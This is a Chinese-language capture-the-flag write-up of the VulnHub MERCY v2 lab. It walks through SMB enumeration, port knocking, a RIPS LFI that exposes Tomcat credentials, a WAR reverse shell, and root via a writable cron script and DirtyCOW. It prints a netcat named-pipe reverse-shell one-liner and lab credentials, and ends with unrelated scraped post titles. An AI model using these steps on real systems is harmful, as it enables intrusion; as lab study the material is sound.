https://www.vulnhub.com/entry/digitalworldlocal-mercy-v2,263/
nat网络
arp-scan -l 比平常多出来的ip就是靶机了

nmap

PORT     STATE    SERVICE     REASON              VERSION
22/tcp   filtered ssh         port-unreach ttl 64
53/tcp   open     domain      syn-ack ttl 64      ISC BIND 9.9.5-3ubuntu0.17 (Ubuntu Linux)
| dns-nsid:
|_  bind.version: 9.9.5-3ubuntu0.17-Ubuntu
80/tcp   filtered http        port-unreach ttl 64
110/tcp  open     pop3        syn-ack ttl 64
| fingerprint-strings:
|   DistCCD, JavaRMI, LANDesk-RC, NCP, NotesRPC, Radmin, Socks4, TerminalServer, WMSRequest, beast2, ibm-db2-das, ms-sql-s, mydoom, oracle-tns:
|     +OK Dovecot (Ubuntu) ready.
|   HELP4STOMP, OfficeScan:
|     +OK Dovecot (Ubuntu) ready.
|     -ERR Unknown command.
|     -ERR Unknown command.
|   Memcache, NessusTPv10, NessusTPv11, NessusTPv12, Verifier, VerifierAdvanced, WWWOFFLEctrlstat, firebird:
|     +OK Dovecot (Ubuntu) ready.
|     -ERR Unknown command.
|   Socks5:
|     +OK Dovecot (Ubuntu) ready.
|     -ERR Unknown command.
|     -ERR Unknown command.
|_    -ERR Unknown command.
|_pop3-capabilities: AUTH-RESP-CODE UIDL SASL RESP-CODES CAPA TOP STLS PIPELINING
|_ssl-date: TLS randomness does not represent time
139/tcp  open     netbios-ssn syn-ack ttl 64      Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp  open     imap        syn-ack ttl 64      Dovecot imapd
|_imap-capabilities: listed more have Pre-login LOGIN-REFERRALS post-login STARTTLS IDLE LITERAL+ capabilities SASL-IR ENABLE ID IMAP4rev1 OK LOGINDISABLEDA0001
|_ssl-date: TLS randomness does not represent time
445/tcp  open     netbios-ssn syn-ack ttl 64      Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
993/tcp  open     ssl/imaps?  syn-ack ttl 64
|_ssl-date: TLS randomness does not represent time
995/tcp  open     ssl/pop3s?  syn-ack ttl 64
|_ssl-date: TLS randomness does not represent time
8080/tcp open     http        syn-ack ttl 64      Apache Tomcat/Coyote JSP engine 1.1
| http-methods:
|   Supported Methods: GET HEAD POST PUT DELETE OPTIONS
|_  Potentially risky methods: PUT DELETE
|_http-open-proxy: Proxy might be redirecting requests
| http-robots.txt: 1 disallowed entry
|_/tryharder/tryharder
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat

扫出很多端口

看到53要想到dns加地址,但是试了试这台靶机无效

22和80一个是ssh登录,一个是网页搜集信息。但都是filter状态, 要想到会不会有端口敲门的考点存在,参考Dc9这台靶机

8080是打开了的http web,这是 tomcat,tomcat的渗透方法参考hackthebox这台靶机Jerry,nmap提示了8080下有新的路径tryharder。
进去看是base64,解码后出来一大段提示。意思是里面设的密码很弱。还有一个密码甚至就是password。
于是我用jerry靶机的思路猜密码,破解等,但都没用。。

信息搜集还不够,也可以用别的工具继续搜集信息,比如autorecon 这里

看到139 445端口开了要想到smb利用
autorecon扫到smb的用户信息qiu,等

也可以

smbclient --list 192.168.189.201  -U ""

看到有个qiu

Sharename       Type      Comment---------       ----      -------print$          Disk      Printer Driversqiu             Disk      IPC$            IPC       IPC Service (MERCY server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.Server               Comment---------            -------Workgroup            Master---------            -------WORKGROUP

这里也是个难点。试了几次,想到之前提示的密码password可以用在这里

smbclient -U "qiu" //192.168.189.201/qiu

.private opensesame config里最终搜到了端口敲门信息

[options]UseSyslog[openHTTP]sequence    = 159,27391,4seq_timeout = 100command     = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 80 -j ACCEPTtcpflags    = syn[closeHTTP]sequence    = 4,27391,159seq_timeout = 100command     = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 80 -j ACCEPTtcpflags    = syn[openSSH]sequence    = 17301,28504,9999seq_timeout = 100command     = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPTtcpflags    = syn[closeSSH]sequence    = 9999,28504,17301seq_timeout = 100

敲开

for x in 159 27391 4; do nmap -Pn --max-retries 0 -p $x 192.168.189.201; done
for x in 17301 28504 9999; do nmap -Pn --max-retries 0 -p $x 192.168.189.201; done

这下80打开了,进去看看。dirbuster扫路径。看到robot.txt又提示了俩新路径,mercy没啥,nomercy进去后是rips界面,写了版本

直接搜漏洞

C:\root> searchsploit rips 0.53
---------------------------------------------------------------------------------------------------------- ----------------------------------------Exploit Title                                                                                            |  Path| (/usr/share/exploitdb/)
---------------------------------------------------------------------------------------------------------- ----------------------------------------
RIPS 0.53 - Multiple Local File Inclusions                                                                | exploits/php/webapps/18660.txt
---------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

说是有漏洞LFI文件包含。试了试果然有经典的/etc/passwd

再想想还可以看什么LFI的路径
此处又回到我们之前对8080 tom猫的测试。之前我搞不出来它的密码

但是之前的8080页面右下角提示了tomcat管理员信息的目录
拿这个目录试试LFI

http://192.168.189.201/nomercy//windows/code.php?file=../../../../../../etc/tomcat7/tomcat-users.xml

得到了管理员和用户的两个账号信息。上面是管理员,后面写了role,角色是管理员

username="thisisasuperduperlonguser" password="heartbreakisinevitable" roles="admin-gui,manager-gui"/>
username="fluffy" password="freakishfluffybunny" roles="none"/>


然后我继续用jerry的靶机方法,进入管理员界面,造弹shell的war包。上传,拿shell
tty: python -c 'import pty; pty.spawn("/bin/bash")'

拿的是tomcat的shell,但是我们已经知道了另一个用户的信息,所以直接su fluffy, 输入密码

搞定
老套路,linpeas.sh自动扫

看到自己目录下的这个文件竟然是root执行,我还有权修改

那我改成弹shell的命令。。echo加上句话,或nano修改,放到最底下

rm -rf /tmp/p; mknod /tmp/p p; /bin/sh 0</tmp/p | nc 192.168.xxx.xxx 5555 1>/tmp/p

根据代码内容好像是再修改和更新时间,看着像是crontab,隔段时间执行的定时任务,
其实我打算上pspy看下进程或别的方法再看下是不是cron job
不过打开监听后
等了一会就收到。。搞定。确实是crontab

还有版本提权方法,毕竟用linpeas,一开始就会报4.4.0的亮眼提示。
搜了下可以用脏牛dirtycow,这是个经典提权文件,就用它了。

C:\root> ./linux-exploit-suggester.sh -k 4.4.0Available information:Kernel version: 4.4.0
Architecture: N/A
Distribution: N/A
Distribution version: N/A
Additional checks (CONFIG_*, sysctl entries, custom Bash commands): N/A
Package listing: N/ASearching among:73 kernel space exploits
0 user space exploitsPossible Exploits:[+] [CVE-2017-16995] eBPF_verifierDetails: https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.htmlExposure: probableTags: debian=9.0{kernel:4.9.0-3-amd64},fedora=25|26|27,ubuntu=14.04{kernel:4.4.0-89-generic},ubuntu=(16.04|17.04){kernel:4.(8|10).0-(19|28|45)-generic}Download URL: https://www.exploit-db.com/download/45010Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1[+] [CVE-2016-5195] dirtycowDetails: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetailsExposure: probableTags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},ubuntu=16.04|14.04|12.04Download URL: https://www.exploit-db.com/download/40611

但是考过去,靶机却说没有安装gcc

只有本机先编译了。但是我的kali2020是64位。靶机是32位。执行不了。 我怕编32位会有莫名其妙错误,保险起见最好还是用32位机编译,我的kali2018 32位虚拟机还在,我在那里面编译的,虽然报错,但是不影响。。
我从这里下载的这个脏牛,用的32位,根据提示编译

然后把编译好的拷到靶机。
成功

vulnhub - digitalworld.local: MERCY v2 (考点:信息搜集 smb 端口敲门 RIPS tomcat linux 提权)相关推荐

  1. Vulnhub:Digitalworld.local (Mercy v2)靶机

    kali:192.168.111.111 靶机:192.168.111.130 信息收集 端口扫描 nmap -A -v -sV -T5 -p- --script=http-enum 192.168. ...

  2. OSCP练习:vulhub靶机DIGITALWORLD.LOCAL: MERCY v2

    nmap扫下端口 nmap -sS -sV 192.168.8.144 发现22.80是关的,应该需要敲门 8080是tomcat页面,但是manager没密码控制台进不去, 提示主机管理器 Web ...

  3. 【甄选靶场】Vulnhub百个项目渗透——项目三:Raven-2(服务利用,udf提权)

    Vulnhub百个项目渗透 Vulnhub百个项目渗透--项目三:Raven-2(服务利用,udf提权)

  4. hackthebox- kotarak(考点:信息搜集隐藏端口 tom 上传 域文件解析 wget-gnu 1.16提权 )

    1扫描搜集 普通nmap -A 扫.8009打不开,8080是汤姆猫,但是没密码. 没有多少价值信息,很可能端口扫描不全,于是速度版全端口再扫 masscan -p1-65535,U:1-65535 ...

  5. Vulnhub:Digitalworld.local (Development)靶机

    kali:192.168.111.111 靶机:192.168.111.130 信息收集 端口扫描 nmap -A -v -sV -T5 -p- --script=http-enum 192.168. ...

  6. linux80瑞口提权口今,史上最全Linux提权后获取敏感信息方法

    在本文开始之前,我想指出我不是专家.据我所知,在这个庞大的区域,没有一个"神奇"的答案.分享,共享(我的出发点).下面是一个混合的命令做同样的事情,在不同的地方,或只是一个不同的眼 ...

  7. vulnhub渗透系列之DC(一) :内含suid的三种提权方法

    我是啊锋,一个努力的学渣,作为一个刚进入安全大门的小白,我希望能把自己所学到的东西总结出来,分享到博客上,可以一起进步,一起交流,一起学习. 实验过程总结 1.这个题我觉得对刚入门的我来说,十分的困难 ...

  8. digitalworld.local: MERCY靶机入侵

    0x01 前言 MERCY是一个致力于PWK课程安全的靶机系统.MERCY是一款游戏名称,与易受攻击的靶机名称无关.本次实验是攻击目标靶机获取root权限并读系统目录中的proof.txt信息 靶机的 ...

  9. Hackthebox-Bart(考点:信息搜集/密码猜解/user-agent注入/window账号利用)

    1. nmap搞起 2.信息搜集&密码猜解 显示forum.bart.htb,把bart和forum.bart都加到/etc/host 里去: 10.10.10.81 forum.bart.h ...

最新文章

  1. 深入理解JVM(二)--垃圾收集算法
  2. iOS ERROR ITMS - 打包上传报错整理
  3. 【Android 逆向】Android 进程注入工具开发 ( EIP 寄存器指向 dlopen 函数 | ESP 寄存器指向栈内存 | 调试程序收回目标进程控制权 )
  4. 解决Win8.1系统LYNC共享PPT提示“演示文稿遇到问题”
  5. 升级到win10,安装visualstudio ,80端口被系统服务占用的解决
  6. SQL Server 2008空间数据应用系列四:基础空间对象与函数应用
  7. 如何open一个新tab页面
  8. SQL Server 2008R2数据库文件导入到SQL Server 2008数据库中
  9. 101 200 之间的素数
  10. 骗分技巧————《OI骗分导论》
  11. 治近视的秘方!1000度近视降到只有200度,不知道有没有用,试试(转)
  12. 自动化测试工具 Selenium WebDriver 入门教程
  13. Excel行高列宽使用单位为磅(1cm=28.6磅)
  14. 华为设备配置IS-IS的负载分担
  15. 混合颜色的色值计算公式
  16. 【教程】ESP32连接华为云IoT平台
  17. 思想者:漫谈大学生的四个LEARN
  18. 小学总结计算机,小学计算机教师年度工作总结
  19. 征战FPGA之使用clk_wiz的IP核获取任意频率时钟
  20. 26.纯 CSS创作按钮被从纸上掀起的立体效果

热门文章

  1. 鬼武者2完整流程功略
  2. gtx1650和gtx1060哪个好
  3. 查询Alexa排名技巧
  4. Windows 10 每次开机都自动弹出 “今日热点”、“热点资讯” “360每日趣玩”等广告窗口
  5. 2015湖南长沙生存费用粗估
  6. tp剩余未验证内容-5
  7. java重要基础知识汇总
  8. SourceGrid 2.0
  9. 通俗易懂C语言--关键字
  10. RocketMQ 的优缺点